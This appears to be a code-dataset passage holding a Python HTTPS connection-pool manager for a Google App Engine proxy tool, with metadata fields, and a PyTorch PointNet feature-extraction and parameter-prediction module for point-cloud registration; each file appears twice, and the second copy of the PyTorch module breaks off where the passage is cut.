google_ip.report_connect_closed(ssl_sock.ip, "alive_timeout") ssl_sock.close() else: self.start_keep_alive(ssl_sock) for host in self.host_conn_pool: host_list = 
self.host_conn_pool[host].get_need_keep_alive(maxtime=self.keep_alive-3) for ssl_sock in host_list: google_ip.report_connect_closed(ssl_sock.ip, "host pool alive_timeout") ssl_sock.close() #self.create_more_connection() time.sleep(1) def save_ssl_connection_for_reuse(self, ssl_sock, host=None, call_time=0): if call_time: ssl_sock.last_use_time = call_time else: ssl_sock.last_use_time = time.time() if host: if host not in self.host_conn_pool: self.host_conn_pool[host] = Connect_pool() self.host_conn_pool[host].put( (ssl_sock.handshake_time, ssl_sock) ) else: self.gae_conn_pool.put( (ssl_sock.handshake_time, ssl_sock) ) while self.gae_conn_pool.qsize() > self.connection_pool_max_num: handshake_time, ssl_sock = self.gae_conn_pool.get_slowest() google_ip.report_connect_closed(ssl_sock.ip, "slowest %d" % ssl_sock.handshake_time) ssl_sock.close() def create_more_connection_worker(self): need_conn_num = self.connection_pool_min_num - self.new_conn_pool.qsize() target_thread_num = min(self.max_thread_num, need_conn_num) while self.thread_num < target_thread_num and self.new_conn_pool.qsize() < self.connection_pool_min_num: if not connect_control.allow_connect(): break self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_thread) p.start() time.sleep(0.3) def create_more_connection(self): p = threading.Thread(target=self.create_more_connection_worker) p.start() def create_connection_daemon(self): connect_start_num = 0 while connect_control.keep_running: time.sleep(0.1) if not connect_control.allow_connect(): time.sleep(5) continue if self.thread_num > self.max_thread_num: continue target_conn_num = (1 - (connect_control.inactive_time()/(10*60))) * self.connection_pool_min_num if self.new_conn_pool.qsize() > target_conn_num: time.sleep(1) continue self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_process) p.start() connect_start_num 
+= 1 if connect_start_num > 10: time.sleep(5) connect_start_num = 0 def connect_process(self): try: ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") return port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def connect_thread(self, sleep_time=0): time.sleep(sleep_time) try: while self.new_conn_pool.qsize() < self.connection_pool_min_num: if self.new_conn_pool.qsize() >= self.connection_pool_min_num: #xlog.debug("get enough conn") break ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") break port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) elif not connect_control.allow_connect(): break time.sleep(1) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def _create_ssl_connection(self, ip_port): if not connect_control.allow_connect(): time.sleep(10) return False sock = None ssl_sock = None ip = ip_port[0] connect_control.start_connect_register(high_prior=True) connect_time = 0 handshake_time = 0 time_begin = time.time() try: if config.PROXY_ENABLE: sock = socks.socksocket(socket.AF_INET if ':' not in ip else socket.AF_INET6) else: sock = socket.socket(socket.AF_INET if ':' not in ip else socket.AF_INET6) # set reuseaddr option to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) # resize socket recv buffer 8K->32K to improve browser 
releated application performance sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32*1024) # disable negal algorithm to send http request quickly. sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, True) # set a short timeout to trigger timeout retry more quickly. sock.settimeout(self.timeout) ssl_sock = SSLConnection(self.openssl_context, sock, ip, google_ip.ssl_closed) ssl_sock.set_connect_state() ssl_sock.connect(ip_port) time_connected = time.time() ssl_sock.do_handshake() time_handshaked = time.time() connect_time = int((time_connected - time_begin) * 1000) handshake_time = int((time_handshaked - time_connected) * 1000) google_ip.update_ip(ip, handshake_time) xlog.debug("create_ssl update ip:%s time:%d", ip, handshake_time) ssl_sock.fd = sock.fileno() ssl_sock.create_time = time_begin ssl_sock.received_size = 0 ssl_sock.load = 0 ssl_sock.handshake_time = handshake_time ssl_sock.host = '' def verify_SSL_certificate_issuer(ssl_sock): cert = ssl_sock.get_peer_certificate() if not cert: #google_ip.report_bad_ip(ssl_sock.ip) #connect_control.fall_into_honeypot() raise socket.error(' certficate is none') issuer_commonname = next((v for k, v in cert.get_issuer().get_components() if k == 'CN'), '') if not issuer_commonname.startswith('Google'): google_ip.report_connect_fail(ip, force_remove=True) raise socket.error(' certficate is issued by %r, not Google' % ( issuer_commonname)) verify_SSL_certificate_issuer(ssl_sock) connect_control.report_connect_success() return ssl_sock except Exception as e: time_cost = time.time() - time_begin if time_cost < self.timeout - 1: xlog.debug("connect %s fail:%s cost:%d h:%d", ip, e, time_cost * 1000, handshake_time) else: xlog.debug("%s fail:%r", ip, e) google_ip.report_connect_fail(ip) connect_control.report_connect_fail() if ssl_sock: ssl_sock.close() if sock: sock.close() return False finally: connect_control.end_connect_register(high_prior=True) def get_ssl_connection(self, host=''): ssl_sock = None if host: if host in 
self.host_conn_pool: while True: ret = self.host_conn_pool[host].get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("host_conn_pool %s get:%s handshake:%d", host, ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue else: while True: ret = self.gae_conn_pool.get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("ssl_pool.get:%s handshake:%d", ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue self.create_more_connection() if ssl_sock: return ssl_sock else: ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("create ssl timeout fail.") return None def get_new_ssl(self): self.create_more_connection() ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("get_new_ssl timeout fail.") return None https_manager = Https_connection_manager()
#!/usr/bin/env python # coding:utf-8 import os import binascii import time import socket import struct import threading import operator import httplib import socks from xlog import getLogger xlog = getLogger("gae_proxy") current_path = os.path.dirname(os.path.abspath(__file__)) import OpenSSL SSLError = OpenSSL.SSL.WantReadError from config import config def load_proxy_config(): if config.PROXY_ENABLE: if config.PROXY_TYPE == "HTTP": proxy_type = socks.HTTP elif config.PROXY_TYPE == "SOCKS4": proxy_type = socks.SOCKS4 elif config.PROXY_TYPE == "SOCKS5": proxy_type = socks.SOCKS5 else: xlog.error("proxy type %s unknown, disable proxy", config.PROXY_TYPE) config.PROXY_ENABLE = 0 return socks.set_default_proxy(proxy_type, config.PROXY_HOST, config.PROXY_PORT, config.PROXY_USER, config.PROXY_PASSWD) load_proxy_config() from google_ip import google_ip from appids_manager import appid_manager from openssl_wrap import SSLConnection NetWorkIOError = (socket.error, SSLError, OpenSSL.SSL.Error, OSError) g_cacertfile = os.path.join(current_path, "cacert.pem") import connect_control class Connect_pool(): def __init__(self): self.pool_lock = threading.Lock() self.not_empty = threading.Condition(self.pool_lock) self.pool = {} def qsize(self): return len(self.pool) def put(self, item): handshake_time, sock = item self.not_empty.acquire() try: self.pool[sock] = handshake_time self.not_empty.notify() finally: self.not_empty.release() def get(self, block=True, timeout=None): self.not_empty.acquire() try: if not block: if not self.qsize(): return None elif timeout is None: while not self.qsize(): self.not_empty.wait() elif timeout < 0: raise ValueError("'timeout' must be a positive number") else: end_time = time.time() + timeout while not self.qsize(): remaining = end_time - time.time() if remaining <= 0.0: return None self.not_empty.wait(remaining) item = self._get() return item finally: self.not_empty.release() def get_nowait(self): return self.get(block=False) def _get(self): 
fastest_time = 9999 fastest_sock = None for sock in self.pool: ip = sock.ip #if not google_ip.is_traffic_quota_allow(ip): # continue time = self.pool[sock] if time < fastest_time or not fastest_sock: fastest_time = time fastest_sock = sock self.pool.pop(fastest_sock) return (fastest_time, fastest_sock) def get_slowest(self): self.not_empty.acquire() try: if not self.qsize(): raise ValueError("no item") slowest_handshake_time = 0 slowest_sock = None for sock in self.pool: handshake_time = self.pool[sock] if handshake_time > slowest_handshake_time: slowest_handshake_time = handshake_time slowest_sock = sock self.pool.pop(slowest_sock) return (slowest_handshake_time, slowest_sock) finally: self.not_empty.release() def get_need_keep_alive(self, maxtime=200): return_list = [] self.pool_lock.acquire() try: pool = tuple(self.pool) for sock in pool: inactive_time = time.time() -sock.last_use_time #logging.debug("inactive_time:%d", inactive_time * 1000) if inactive_time >= maxtime: return_list.append(sock) del self.pool[sock] return return_list finally: self.pool_lock.release() def clear(self): self.pool_lock.acquire() try: for sock in self.pool: sock.close() self.pool = {} finally: self.pool_lock.release() def to_string(self): str = '' self.pool_lock.acquire() try: pool = sorted(self.pool.items(), key=operator.itemgetter(1)) i = 0 for item in pool: sock,t = item str += "%d \t %s handshake:%d not_active_time:%d\r\n" % (i, sock.ip, t, time.time() -sock.last_use_time) i += 1 finally: self.pool_lock.release() return str class Https_connection_manager(object): thread_num_lock = threading.Lock() def __init__(self): # http://docs.python.org/dev/library/ssl.html # http://blog.ivanristic.com/2009/07/examples-of-the-information-collected-from-ssl-handshakes.html # http://src.chromium.org/svn/trunk/src/net/third_party/nss/ssl/sslenum.c # openssl s_server -accept 443 -key CA.crt -cert CA.crt # ref: http://vincent.bernat.im/en/blog/2011-ssl-session-reuse-rfc5077.html 
self.openssl_context = SSLConnection.context_builder(ca_certs=g_cacertfile) self.openssl_context.set_session_id(binascii.b2a_hex(os.urandom(10))) if hasattr(OpenSSL.SSL, 'SESS_CACHE_BOTH'): self.openssl_context.set_session_cache_mode(OpenSSL.SSL.SESS_CACHE_BOTH) self.timeout = 4 self.max_timeout = 15 self.thread_num = 0 self.load_config() if self.keep_alive: p = threading.Thread(target = self.keep_alive_thread) p.daemon = True p.start() p = threading.Thread(target = self.create_connection_daemon) p.daemon = True p.start() def load_config(self): self.max_thread_num = config.CONFIG.getint("connect_manager", "https_max_connect_thread") self.connection_pool_max_num = config.CONFIG.getint("connect_manager", "https_connection_pool_max") self.connection_pool_min_num = config.CONFIG.getint("connect_manager", "https_connection_pool_min") self.keep_alive = config.CONFIG.getint("connect_manager", "https_keep_alive") self.new_conn_pool = Connect_pool() self.gae_conn_pool = Connect_pool() self.host_conn_pool = {} def clean_old_connection(self): self.gae_conn_pool.clear() def head_request(self, ssl_sock): if ssl_sock.host == '': ssl_sock.appid = appid_manager.get_appid() if not ssl_sock.appid: xlog.error("no appid can use") return False host = ssl_sock.appid + ".appspot.com" ssl_sock.host = host else: host = ssl_sock.host # public appid don't keep alive, for quota limit. 
if ssl_sock.appid.startswith("xxnet-") and ssl_sock.appid[7:].isdigit(): #logging.info("public appid don't keep alive") #self.keep_alive = 0 return False #logging.debug("head request %s", host) request_data = 'HEAD /_gh/ HTTP/1.1\r\nHost: %s\r\n\r\n' % host response = None try: ssl_sock.settimeout(10) ssl_sock._sock.settimeout(10) data = request_data.encode() ret = ssl_sock.send(data) if ret != len(data): xlog.warn("head send len:%d %d", ret, len(data)) response = httplib.HTTPResponse(ssl_sock, buffering=True) response.begin() status = response.status if status != 200: xlog.debug("app head fail status:%d", status) raise Exception("app check fail %r" % status) return True except httplib.BadStatusLine as e: inactive_time = time.time() - ssl_sock.last_use_time xlog.debug("%s keep alive fail, time:%d", ssl_sock.ip, inactive_time) return False except Exception as e: xlog.warn("%s head %s request fail:%r", ssl_sock.ip, ssl_sock.appid, e) return False finally: if response: response.close() def keep_alive_worker(self, sock): call_time = time.time() if self.head_request(sock): self.save_ssl_connection_for_reuse(sock, call_time=call_time) else: google_ip.report_connect_closed(sock.ip, "HEAD") sock.close() #self.create_more_connection() def start_keep_alive(self, sock): work_thread = threading.Thread(target=self.keep_alive_worker, args=(sock,)) work_thread.start() def keep_alive_thread(self): while self.keep_alive and connect_control.keep_running: if not connect_control.is_active(): time.sleep(1) continue new_list = self.new_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) old_list = self.gae_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) to_keep_live_list = new_list + old_list for ssl_sock in to_keep_live_list: inactive_time = time.time() - ssl_sock.last_use_time if inactive_time > self.keep_alive: google_ip.report_connect_closed(ssl_sock.ip, "alive_timeout") ssl_sock.close() else: self.start_keep_alive(ssl_sock) for host in self.host_conn_pool: host_list = 
self.host_conn_pool[host].get_need_keep_alive(maxtime=self.keep_alive-3) for ssl_sock in host_list: google_ip.report_connect_closed(ssl_sock.ip, "host pool alive_timeout") ssl_sock.close() #self.create_more_connection() time.sleep(1) def save_ssl_connection_for_reuse(self, ssl_sock, host=None, call_time=0): if call_time: ssl_sock.last_use_time = call_time else: ssl_sock.last_use_time = time.time() if host: if host not in self.host_conn_pool: self.host_conn_pool[host] = Connect_pool() self.host_conn_pool[host].put( (ssl_sock.handshake_time, ssl_sock) ) else: self.gae_conn_pool.put( (ssl_sock.handshake_time, ssl_sock) ) while self.gae_conn_pool.qsize() > self.connection_pool_max_num: handshake_time, ssl_sock = self.gae_conn_pool.get_slowest() google_ip.report_connect_closed(ssl_sock.ip, "slowest %d" % ssl_sock.handshake_time) ssl_sock.close() def create_more_connection_worker(self): need_conn_num = self.connection_pool_min_num - self.new_conn_pool.qsize() target_thread_num = min(self.max_thread_num, need_conn_num) while self.thread_num < target_thread_num and self.new_conn_pool.qsize() < self.connection_pool_min_num: if not connect_control.allow_connect(): break self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_thread) p.start() time.sleep(0.3) def create_more_connection(self): p = threading.Thread(target=self.create_more_connection_worker) p.start() def create_connection_daemon(self): connect_start_num = 0 while connect_control.keep_running: time.sleep(0.1) if not connect_control.allow_connect(): time.sleep(5) continue if self.thread_num > self.max_thread_num: continue target_conn_num = (1 - (connect_control.inactive_time()/(10*60))) * self.connection_pool_min_num if self.new_conn_pool.qsize() > target_conn_num: time.sleep(1) continue self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_process) p.start() connect_start_num 
+= 1 if connect_start_num > 10: time.sleep(5) connect_start_num = 0 def connect_process(self): try: ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") return port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def connect_thread(self, sleep_time=0): time.sleep(sleep_time) try: while self.new_conn_pool.qsize() < self.connection_pool_min_num: if self.new_conn_pool.qsize() >= self.connection_pool_min_num: #xlog.debug("get enough conn") break ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") break port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) elif not connect_control.allow_connect(): break time.sleep(1) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def _create_ssl_connection(self, ip_port): if not connect_control.allow_connect(): time.sleep(10) return False sock = None ssl_sock = None ip = ip_port[0] connect_control.start_connect_register(high_prior=True) connect_time = 0 handshake_time = 0 time_begin = time.time() try: if config.PROXY_ENABLE: sock = socks.socksocket(socket.AF_INET if ':' not in ip else socket.AF_INET6) else: sock = socket.socket(socket.AF_INET if ':' not in ip else socket.AF_INET6) # set reuseaddr option to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) # resize socket recv buffer 8K->32K to improve browser 
releated application performance sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32*1024) # disable negal algorithm to send http request quickly. sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, True) # set a short timeout to trigger timeout retry more quickly. sock.settimeout(self.timeout) ssl_sock = SSLConnection(self.openssl_context, sock, ip, google_ip.ssl_closed) ssl_sock.set_connect_state() ssl_sock.connect(ip_port) time_connected = time.time() ssl_sock.do_handshake() time_handshaked = time.time() connect_time = int((time_connected - time_begin) * 1000) handshake_time = int((time_handshaked - time_connected) * 1000) google_ip.update_ip(ip, handshake_time) xlog.debug("create_ssl update ip:%s time:%d", ip, handshake_time) ssl_sock.fd = sock.fileno() ssl_sock.create_time = time_begin ssl_sock.received_size = 0 ssl_sock.load = 0 ssl_sock.handshake_time = handshake_time ssl_sock.host = '' def verify_SSL_certificate_issuer(ssl_sock): cert = ssl_sock.get_peer_certificate() if not cert: #google_ip.report_bad_ip(ssl_sock.ip) #connect_control.fall_into_honeypot() raise socket.error(' certficate is none') issuer_commonname = next((v for k, v in cert.get_issuer().get_components() if k == 'CN'), '') if not issuer_commonname.startswith('Google'): google_ip.report_connect_fail(ip, force_remove=True) raise socket.error(' certficate is issued by %r, not Google' % ( issuer_commonname)) verify_SSL_certificate_issuer(ssl_sock) connect_control.report_connect_success() return ssl_sock except Exception as e: time_cost = time.time() - time_begin if time_cost < self.timeout - 1: xlog.debug("connect %s fail:%s cost:%d h:%d", ip, e, time_cost * 1000, handshake_time) else: xlog.debug("%s fail:%r", ip, e) google_ip.report_connect_fail(ip) connect_control.report_connect_fail() if ssl_sock: ssl_sock.close() if sock: sock.close() return False finally: connect_control.end_connect_register(high_prior=True) def get_ssl_connection(self, host=''): ssl_sock = None if host: if host in 
self.host_conn_pool: while True: ret = self.host_conn_pool[host].get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("host_conn_pool %s get:%s handshake:%d", host, ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue else: while True: ret = self.gae_conn_pool.get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("ssl_pool.get:%s handshake:%d", ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue self.create_more_connection() if ssl_sock: return ssl_sock else: ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("create ssl timeout fail.") return None def get_new_ssl(self): self.create_more_connection() ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("get_new_ssl timeout fail.") return None https_manager = Https_connection_manager()
en
0.44673
#!/usr/bin/env python # coding:utf-8 #if not google_ip.is_traffic_quota_allow(ip): # continue #logging.debug("inactive_time:%d", inactive_time * 1000) # http://docs.python.org/dev/library/ssl.html # http://blog.ivanristic.com/2009/07/examples-of-the-information-collected-from-ssl-handshakes.html # http://src.chromium.org/svn/trunk/src/net/third_party/nss/ssl/sslenum.c # openssl s_server -accept 443 -key CA.crt -cert CA.crt # ref: http://vincent.bernat.im/en/blog/2011-ssl-session-reuse-rfc5077.html # public appid don't keep alive, for quota limit. #logging.info("public appid don't keep alive") #self.keep_alive = 0 #logging.debug("head request %s", host) #self.create_more_connection() #self.create_more_connection() #logging.debug("create ssl conn %s", ip_str) #xlog.debug("get enough conn") #logging.debug("create ssl conn %s", ip_str) # set reuseaddr option to avoid 10048 socket error # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error # resize socket recv buffer 8K->32K to improve browser releated application performance # disable negal algorithm to send http request quickly. # set a short timeout to trigger timeout retry more quickly. #google_ip.report_bad_ip(ssl_sock.ip) #connect_control.fall_into_honeypot()
2.205275
2
src/models/feature_nets.py
yewzijian/RPMNet
223
6628986
"""Feature Extraction and Parameter Prediction networks """ import logging import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from models.pointnet_util import sample_and_group_multi _raw_features_sizes = {'xyz': 3, 'dxyz': 3, 'ppf': 4} _raw_features_order = {'xyz': 0, 'dxyz': 1, 'ppf': 2} class ParameterPredictionNet(nn.Module): def __init__(self, weights_dim): """PointNet based Parameter prediction network Args: weights_dim: Number of weights to predict (excluding beta), should be something like [3], or [64, 3], for 3 types of features """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.weights_dim = weights_dim # Pointnet self.prepool = nn.Sequential( nn.Conv1d(4, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 128, 1), nn.GroupNorm(8, 128), nn.ReLU(), nn.Conv1d(128, 1024, 1), nn.GroupNorm(16, 1024), nn.ReLU(), ) self.pooling = nn.AdaptiveMaxPool1d(1) self.postpool = nn.Sequential( nn.Linear(1024, 512), nn.GroupNorm(16, 512), nn.ReLU(), nn.Linear(512, 256), nn.GroupNorm(16, 256), nn.ReLU(), nn.Linear(256, 2 + np.prod(weights_dim)), ) self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """ Returns alpha, beta, and gating_weights (if needed) Args: x: List containing two point clouds, x[0] = src (B, J, 3), x[1] = ref (B, K, 3) Returns: beta, alpha, weightings """ src_padded = F.pad(x[0], (0, 1), mode='constant', value=0) ref_padded = F.pad(x[1], (0, 1), mode='constant', value=1) concatenated = torch.cat([src_padded, ref_padded], dim=1) prepool_feat = self.prepool(concatenated.permute(0, 2, 1)) pooled = torch.flatten(self.pooling(prepool_feat), start_dim=-2) raw_weights = self.postpool(pooled) beta = F.softplus(raw_weights[:, 0]) alpha = F.softplus(raw_weights[:, 1]) return beta, alpha class ParameterPredictionNetConstant(nn.Module): def 
__init__(self, weights_dim): """Parameter Prediction Network with single alpha/beta as parameter. See: Ablation study (Table 4) in paper """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.anneal_weights = nn.Parameter(torch.zeros(2 + np.prod(weights_dim))) self.weights_dim = weights_dim self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """Returns beta, gating_weights""" batch_size = x[0].shape[0] raw_weights = self.anneal_weights beta = F.softplus(raw_weights[0].expand(batch_size)) alpha = F.softplus(raw_weights[1].expand(batch_size)) return beta, alpha def get_prepool(in_dim, out_dim): """Shared FC part in PointNet before max pooling""" net = nn.Sequential( nn.Conv2d(in_dim, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), ) return net def get_postpool(in_dim, out_dim): """Linear layers in PointNet after max pooling Args: in_dim: Number of input channels out_dim: Number of output channels. 
Typically smaller than in_dim """ net = nn.Sequential( nn.Conv1d(in_dim, in_dim, 1), nn.GroupNorm(8, in_dim), nn.ReLU(), nn.Conv1d(in_dim, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), nn.Conv1d(out_dim, out_dim, 1), ) return net class FeatExtractionEarlyFusion(nn.Module): """Feature extraction Module that extracts hybrid features""" def __init__(self, features, feature_dim, radius, num_neighbors): super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self._logger.info('Using early fusion, feature dim = {}'.format(feature_dim)) self.radius = radius self.n_sample = num_neighbors self.features = sorted(features, key=lambda f: _raw_features_order[f]) self._logger.info('Feature extraction using features {}'.format(', '.join(self.features))) # Layers raw_dim = np.sum([_raw_features_sizes[f] for f in self.features]) # number of channels after concat self.prepool = get_prepool(raw_dim, feature_dim * 2) self.postpool = get_postpool(feature_dim * 2, feature_dim) def forward(self, xyz, normals): """Forward pass of the feature extraction network Args: xyz: (B, N, 3) normals: (B, N, 3) Returns: cluster features (B, N, C) """ features = sample_and_group_multi(-1, self.radius, self.n_sample, xyz, normals) features['xyz'] = features['xyz'][:, :, None, :] # Gate and concat concat = [] for i in range(len(self.features)): f = self.features[i] expanded = (features[f]).expand(-1, -1, self.n_sample, -1) concat.append(expanded) fused_input_feat = torch.cat(concat, -1) # Prepool_FC, pool, postpool-FC new_feat = fused_input_feat.permute(0, 3, 2, 1) # [B, 10, n_sample, N] new_feat = self.prepool(new_feat) pooled_feat = torch.max(new_feat, 2)[0] # Max pooling (B, C, N) post_feat = self.postpool(pooled_feat) # Post pooling dense layers cluster_feat = post_feat.permute(0, 2, 1) cluster_feat = cluster_feat / torch.norm(cluster_feat, dim=-1, keepdim=True) return cluster_feat # (B, N, C)
"""Feature Extraction and Parameter Prediction networks """ import logging import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from models.pointnet_util import sample_and_group_multi _raw_features_sizes = {'xyz': 3, 'dxyz': 3, 'ppf': 4} _raw_features_order = {'xyz': 0, 'dxyz': 1, 'ppf': 2} class ParameterPredictionNet(nn.Module): def __init__(self, weights_dim): """PointNet based Parameter prediction network Args: weights_dim: Number of weights to predict (excluding beta), should be something like [3], or [64, 3], for 3 types of features """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.weights_dim = weights_dim # Pointnet self.prepool = nn.Sequential( nn.Conv1d(4, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 128, 1), nn.GroupNorm(8, 128), nn.ReLU(), nn.Conv1d(128, 1024, 1), nn.GroupNorm(16, 1024), nn.ReLU(), ) self.pooling = nn.AdaptiveMaxPool1d(1) self.postpool = nn.Sequential( nn.Linear(1024, 512), nn.GroupNorm(16, 512), nn.ReLU(), nn.Linear(512, 256), nn.GroupNorm(16, 256), nn.ReLU(), nn.Linear(256, 2 + np.prod(weights_dim)), ) self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """ Returns alpha, beta, and gating_weights (if needed) Args: x: List containing two point clouds, x[0] = src (B, J, 3), x[1] = ref (B, K, 3) Returns: beta, alpha, weightings """ src_padded = F.pad(x[0], (0, 1), mode='constant', value=0) ref_padded = F.pad(x[1], (0, 1), mode='constant', value=1) concatenated = torch.cat([src_padded, ref_padded], dim=1) prepool_feat = self.prepool(concatenated.permute(0, 2, 1)) pooled = torch.flatten(self.pooling(prepool_feat), start_dim=-2) raw_weights = self.postpool(pooled) beta = F.softplus(raw_weights[:, 0]) alpha = F.softplus(raw_weights[:, 1]) return beta, alpha class ParameterPredictionNetConstant(nn.Module): def 
__init__(self, weights_dim): """Parameter Prediction Network with single alpha/beta as parameter. See: Ablation study (Table 4) in paper """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.anneal_weights = nn.Parameter(torch.zeros(2 + np.prod(weights_dim))) self.weights_dim = weights_dim self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """Returns beta, gating_weights""" batch_size = x[0].shape[0] raw_weights = self.anneal_weights beta = F.softplus(raw_weights[0].expand(batch_size)) alpha = F.softplus(raw_weights[1].expand(batch_size)) return beta, alpha def get_prepool(in_dim, out_dim): """Shared FC part in PointNet before max pooling""" net = nn.Sequential( nn.Conv2d(in_dim, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), ) return net def get_postpool(in_dim, out_dim): """Linear layers in PointNet after max pooling Args: in_dim: Number of input channels out_dim: Number of output channels. 
Typically smaller than in_dim """ net = nn.Sequential( nn.Conv1d(in_dim, in_dim, 1), nn.GroupNorm(8, in_dim), nn.ReLU(), nn.Conv1d(in_dim, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), nn.Conv1d(out_dim, out_dim, 1), ) return net class FeatExtractionEarlyFusion(nn.Module): """Feature extraction Module that extracts hybrid features""" def __init__(self, features, feature_dim, radius, num_neighbors): super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self._logger.info('Using early fusion, feature dim = {}'.format(feature_dim)) self.radius = radius self.n_sample = num_neighbors self.features = sorted(features, key=lambda f: _raw_features_order[f]) self._logger.info('Feature extraction using features {}'.format(', '.join(self.features))) # Layers raw_dim = np.sum([_raw_features_sizes[f] for f in self.features]) # number of channels after concat self.prepool = get_prepool(raw_dim, feature_dim * 2) self.postpool = get_postpool(feature_dim * 2, feature_dim) def forward(self, xyz, normals): """Forward pass of the feature extraction network Args: xyz: (B, N, 3) normals: (B, N, 3) Returns: cluster features (B, N, C) """ features = sample_and_group_multi(-1, self.radius, self.n_sample, xyz, normals) features['xyz'] = features['xyz'][:, :, None, :] # Gate and concat concat = [] for i in range(len(self.features)): f = self.features[i] expanded = (features[f]).expand(-1, 